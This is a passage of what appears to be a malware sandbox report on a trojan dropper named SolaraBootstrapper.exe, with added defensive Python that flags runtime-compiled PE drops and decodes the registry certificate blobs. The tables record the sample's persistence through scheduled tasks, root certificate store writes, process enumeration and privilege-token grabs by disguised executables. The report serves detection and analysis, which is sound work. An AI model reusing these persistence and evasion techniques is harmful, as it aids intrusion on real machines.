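    # Kernel-side events arrive as \??\c:\..., user-mode ones as C:\...
    if path.startswith("\\??\\"):
        path = path[4:]
    return path.lower()


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append({"op": m["op"], "path": normalize(m["path"]),
                         "writer": m["writer"].lower().rsplit("\\", 1)[-1]})
    return rows


def compiled_at_runtime(text):
    """Directories where csc.exe left both a CSC<hex>.TMP scratch file and a
    PE: those PEs were compiled on this host, not carried in the dropper."""
    by_dir = defaultdict(lambda: {"tmp": 0, "pe": []})
    for r in parse_rows(text):
        if r["writer"] != "csc.exe" or r["op"] != "File created":
            continue
        directory, _, name = r["path"].rpartition("\\")
        if name.startswith("csc") and name.endswith(".tmp"):
            by_dir[directory]["tmp"] += 1
        elif name.endswith(PE_EXTENSIONS):
            by_dir[directory]["pe"].append(name)
    return {d: v["pe"] for d, v in by_dir.items() if v["tmp"] and v["pe"]}


def suspicious_pe_drops(text):
    """(path, writer) for PE files created in privileged directories by a
    process that is not one of the installers expected to write there."""
    hits = []
    for r in parse_rows(text):
        if r["op"] != "File created" or not r["path"].endswith(PE_EXTENSIONS):
            continue
        if r["path"].startswith(PRIVILEGED_ROOTS) and r["writer"] not in EXPECTED_WRITERS:
            hits.append((r["path"], r["writer"]))
    return hits


if __name__ == "__main__":
    for directory, pes in compiled_at_runtime(SAMPLE_ROWS).items():
        print("compiled by csc.exe in", directory + ":", ", ".join(pes))
    for path, writer in suspicious_pe_drops(SAMPLE_ROWS):
        print("PE drop", path, "by", writer)
```

The csc.exe rows are the detail worth a detection rule of their own: the .NET compiler writing an executable straight into System32 or Program Files has no business happening on an endpoint outside a build machine, and it sidesteps any hash-based block on the dropper.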

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a
4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (Blob data omitted) C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (Blob data omitted) C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21
542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Windows\twain_32\sppsvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = (Blob data omitted) C:\Windows\twain_32\sppsvc.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (Blob data omitted) C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
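Added example, written for this page and not part of the report: a decoder for the Blob values in the table above. Windows stores each certificate in the registry as a list of (property id, element version, length, data) elements; element 0x20 carries the DER certificate and element 0x03 the SHA-1 thumbprint the key is named after, so the check a responder wants is whether the key name is really the thumbprint of the certificate inside, and what that certificate's common name is. FAKE_DER is a constructed stand-in (a bare DER name, not a real certificate) used so the script runs offline; REPORT_BLOB_PREFIX is the first two elements of the D1EB23A4... Blob copied from the table above. The two entries in KNOWN_PUBLIC_ROOTS are well-known public root fingerprints stated from general knowledge; the matching subject strings are also readable as ASCII inside the hex above ("AAA Certificate Services", "Comodo CA Limited"; "ISRG Root X1", "Internet Security Research Group").

```python
import hashlib
import struct

# Property ids used in the element list (names as in wincrypt.h).
CERT_SHA1_HASH_PROP_ID = 0x03   # thumbprint the registry key is named after
CERT_CERT_PROP_ID = 0x20        # the DER-encoded certificate itself

# Well-known SHA-1 fingerprints of two public roots (general knowledge).
KNOWN_PUBLIC_ROOTS = {
    "D1EB23A46D17D68FD92564C2F1F1601764D8E349": "AAA Certificate Services (Comodo CA Limited)",
    "CABD2A79A1076A31F21D253635CB039D4329A5E8": "ISRG Root X1 (Internet Security Research Group)",
}

# First two elements of the D1EB23A4... Blob as printed in this report:
# 0x0f (signature hash, 20 bytes) and 0x09 (enhanced key usage, 0x34 bytes).
REPORT_BLOB_PREFIX = (
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286"
    "090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308"
)


def parse_cert_blob(blob):
    """Walk the element list stored in a SystemCertificates\\...\\Blob value.
    Each element: property id (u32 LE), element version (u32 LE, always 1),
    data length (u32 LE), then that many data bytes."""
    props, off = {}, 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated element header at offset {off}")
        prop_id, version, length = struct.unpack_from("<III", blob, off)
        off += 12
        if version != 1:
            raise ValueError(f"unexpected element version {version} at offset {off - 12}")
        if off + length > len(blob):
            raise ValueError(f"element 0x{prop_id:02x} runs past the end of the blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def common_names(der):
    """Cheap CN extraction without an ASN.1 library: each id-at-commonName
    attribute is OID 2.5.4.3 (bytes 06 03 55 04 03) followed by a
    PrintableString (0x13) or UTF8String (0x0c) with a short-form length.
    Returns CNs in order of appearance (issuer first, then subject)."""
    marker, names, start = b"\x06\x03\x55\x04\x03", [], 0
    while (i := der.find(marker, start)) != -1:
        if i + 7 > len(der):
            break
        tag, length = der[i + 5], der[i + 6]
        if tag in (0x0c, 0x13) and length < 0x80:
            names.append(der[i + 7:i + 7 + length].decode("utf-8", "replace"))
        start = i + 5
    return names


def check_blob(key_name, blob_hex):
    """Confirm the key name is the SHA-1 of the certificate the Blob carries and
    surface what decides between a planted root and routine root caching."""
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    der = props.get(CERT_CERT_PROP_ID)
    if der is None:
        raise ValueError("Blob carries no certificate element (0x20)")
    thumbprint = hashlib.sha1(der).hexdigest()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    return {
        "thumbprint": thumbprint.upper(),
        "key_name_matches": thumbprint == key_name.lower(),
        "stored_hash_matches": stored == thumbprint,
        "common_names": common_names(der),
        "known_public_root": KNOWN_PUBLIC_ROOTS.get(thumbprint.upper()),
        "property_ids": sorted(props),
    }


def _element(prop_id, data):
    # Builds one element in the on-disk format; used only to construct test input.
    return struct.pack("<III", prop_id, 1, len(data)) + data


# Constructed stand-in for a certificate: just enough DER to carry one CN,
# SEQUENCE { SET { SEQUENCE { OID 2.5.4.3, UTF8String "Sandbox Test CA" } } }.
FAKE_DER = b"\x30\x1a\x31\x18\x30\x16\x06\x03\x55\x04\x03\x0c\x0fSandbox Test CA"
FAKE_BLOB = _element(CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_DER).digest()) + _element(CERT_CERT_PROP_ID, FAKE_DER)
FAKE_KEY_NAME = hashlib.sha1(FAKE_DER).hexdigest().upper()

if __name__ == "__main__":
    print(check_blob(FAKE_KEY_NAME, FAKE_BLOB.hex()))
    print({hex(k): len(v) for k, v in parse_cert_blob(bytes.fromhex(REPORT_BLOB_PREFIX)).items()})
```

Feed the full hex of either Blob printed above to check_blob with its key name: both decode to a well-known public root whose thumbprint is the key name. AuthRoot is the cache CryptoAPI fills from the automatic root update, and the root-update logic runs inside the calling process, which is why the sandbox attributes the writes to sppsvc.exe and SolaraBootstrapper.exe after they opened TLS connections. On its own, then, this signature is consistent with a missing public root being fetched on demand rather than with a private CA being planted; the case that would matter is a Blob whose certificate is not a recognised public root, or a write under ROOT by a process with no reason to be doing TLS.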

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\system32\CMD.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\twain_32\sppsvc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\twain_32\sppsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
